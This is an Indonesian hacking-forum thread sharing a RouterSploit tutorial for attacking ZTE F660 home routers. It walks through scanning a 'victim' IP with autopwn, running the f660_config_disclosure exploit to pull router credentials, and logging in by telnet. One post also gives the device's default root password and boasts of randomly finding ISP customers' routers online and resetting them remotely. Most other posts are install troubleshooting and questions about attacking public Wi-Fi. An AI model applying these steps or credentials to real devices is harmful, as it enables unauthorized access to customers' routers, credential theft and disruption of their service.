[Share] Exploit Router with RouterSploit
#11
untuk F660 sebenarnya simple om ndak perlu pakek tools,
langsung aja konek ke network tu router, trus akses via telnet dengan ZOG biar ada lognya.

user: root
pass: Zte521,

ane kadang iseng acak id pelanggan di ip-dynamic untuk mendapatkan IP publicnya dan beberapa ada yang langsung bisa di akses dari luar. jadi bisa tu reset jarak jauh biar indihoy dapat komplen mulu :v

#12
(06-03-2016, 10:49 PM)Rues_96 Wrote: ane stuck di sini om
ImportError: No module named cryptography.hazmat.backends
Spoiler! :
[Image: 33y2ycp.png]

tambahin dulu module cryptonya om Shy
Code:
pip install cryptography
untuk melihat daftar module paket python
Code:
dpkg --list python*
untuk melihat status module sudah ditambahkan
Code:
dpkg --status python-crypto


(06-04-2016, 09:09 AM)ediyantosuroso Wrote: untuk F660 sebenarnya simple om ndak perlu pakek tools,
langsung aja konek ke network tu router, trus akses via telnet dengan ZOG biar ada lognya.

user: root
pass: Zte521,

ane kadang iseng acak id pelanggan di ip-dynamic untuk mendapatkan IP publicnya dan beberapa ada yang langsung bisa di akses dari luar. jadi bisa tu reset jarak jauh biar indihoy dapat komplen mulu :v

yap, benar skali om, krena user am pwd modem masih standar, bisa dilihat aj d modulenya
Spoiler! :
[Image: KJzMh5C.png]
manfaat tool ini memudahkan kita utk mndapatkan user am pwd pelanggan, tanpa harus masuk ke direktori cfg utk menampilkan isi dari file db_user_cfg.xml utk memperoleh informasi berupa user, pwd, essid, dan keyphase modem cmiww Big Grin

klau buat iseng apalagi smpai reset modem pelanggan, saya gk pernah om
karena saya tau gimna capeknya kerja di lapangan, apalagi datang kerumah pelanggan yang gangguannya cuma hanya untuk reset modemĀ Undecided
codename@tong:~# Try Harder!

#13
(05-26-2016, 07:21 PM)tong Wrote: Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.

Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routers...buntu-1604

Installation
Code:
git clone https://github.com/reverse-shell/routersploit

Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Spoiler! :
[Image: eiusx.png]

Usage
Code:
python rsf.py
use scanners/autopwn
set target "ip victim"
Spoiler! :
[Image: pjIFw.png]

kemudian jalankan module
Code:
run
Spoiler! :
[Image: rZ1ea.png]

Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure

Code:
use exploits/zte/f660_config_disclosure
set target "ip victim"
run
Spoiler! :
[Image: mKAtx.png]

wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router Smile
Code:
telnet "ip victim"
Spoiler! :
[Image: bnpYF.png]

wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok

Update
Code:
cd routersploit
git pull

Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat Smile

source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_

mantabb om, izin icipp..icipp... kimochii...

#14
(06-06-2016, 10:35 AM)hehehe Wrote:
(05-26-2016, 07:21 PM)tong Wrote: Assalamuallaikum
Kali ini saya mau share tools untuk eksploitasi pada router, tidak semua router bisa di eksploitasi dengan RouterSploit, hanya yang vulnerable saja pada module
yang sudah di sediakan.

Untuk instalasi pada OSX & Ubuntu bisa dilihat di sini https://github.com/reverse-shell/routers...buntu-1604

Installation
Code:
git clone https://github.com/reverse-shell/routersploit

Nah disini saya sudah mendapatkan victim, jangan lupa scan dulu dengan module autopwn, untuk mengecek apakah router vulnerable dengan module yang disediakan oleh RouterSploit.
Spoiler! :
[Image: eiusx.png]

Usage
Code:
python rsf.py
use scanners/autopwn
set target "ip victim"
Spoiler! :
[Image: pjIFw.png]

kemudian jalankan module
Code:
run
Spoiler! :
[Image: rZ1ea.png]

Ternyata router vulnerable, langsung saja kita exploit router dengan module yang direkomendasikan RouterSploit. Disini saya gunakan module zte/f660_config_disclosure

Code:
use exploits/zte/f660_config_disclosure
set target "ip victim"
run
Spoiler! :
[Image: mKAtx.png]

wow, exploit berhasil, saya mendapatkan username dan password router, mari coba kita login ke telnet server pada modem router Smile
Code:
telnet "ip victim"
Spoiler! :
[Image: bnpYF.png]

wew, login sukses vroh
ow iya, untuk update toolsnya juga simple kok

Update
Code:
cd routersploit
git pull

Demikianlah mengenai tools RouterSploit
Terimakasih dan semoga bermanfaat Smile

source :
Patching ZTE F6XX Router
Nih buat yang mau ngamanin routernya, tools buatan om @devilscream_

mantabb om, izin icipp..icipp... kimochii...

monggo om, ikeh ikeh kimochii :v
codename@tong:~# Try Harder!

#15
[Image: 264724e8db4f4928a86293109aff862a.png]

ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
Spoiler! :
[Image: 737fe5608a024cc9832c2f2d072afad6.png]

tp ttp aja versinya 2.0.0
Spoiler! :
[Image: 91c6f75a1fe94a58bdb0d528010482b8.png]

mohon pencerahanya

#16
klo punya wifi.id bisa gak ? XD

#17
(06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD

kaya e bisa, kan intinya kita itu cari celahnya di routernya

#18
(06-14-2016, 02:42 AM)jaenab Wrote: [Image: 264724e8db4f4928a86293109aff862a.png]

ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
Spoiler! :
[Image: 737fe5608a024cc9832c2f2d072afad6.png]

tp ttp aja versinya 2.0.0
Spoiler! :
[Image: 91c6f75a1fe94a58bdb0d528010482b8.png]

mohon pencerahanya

Tlong perbaiki lgi ss nya om, kgak nongol


(06-15-2016, 02:49 AM)jaenab Wrote:
(06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD

kaya e bisa, kan intinya kita itu cari celahnya di routernya

iye bner om, hnya yg vulnerable saja, dan juga trgantung modul yg disediakan Shy
codename@tong:~# Try Harder!

#19
sekilas hampir mirip sama metasploit yah om Big Grin
Twitter : Orang Sederhana
FB : Orang Sederhana
OrangSederhana@IBTeam:~#


#20
(06-15-2016, 04:48 AM)tong Wrote:
(06-14-2016, 02:42 AM)jaenab Wrote: [Image: 264724e8db4f4928a86293109aff862a.png]

ini kenapa ya ?
kan pake perintah instal git clone ga bisa, trus pake apt get bisa, tp dengan versi 2.0.0
dan coba saya update ttp sama, akhirnya saya git clone lagi bisa
Spoiler! :
[Image: 737fe5608a024cc9832c2f2d072afad6.png]

tp ttp aja versinya 2.0.0
Spoiler! :
[Image: 91c6f75a1fe94a58bdb0d528010482b8.png]

mohon pencerahanya

Tlong perbaiki lgi ss nya om, kgak nongol


(06-15-2016, 02:49 AM)jaenab Wrote:
(06-14-2016, 09:25 PM)Mudksovic Wrote: klo punya wifi.id bisa gak ? XD

kaya e bisa, kan intinya kita itu cari celahnya di routernya

iye bner om, hnya yg vulnerable saja, dan juga trgantung modul yg disediakan Shy






Users browsing this thread: 1 Guest(s)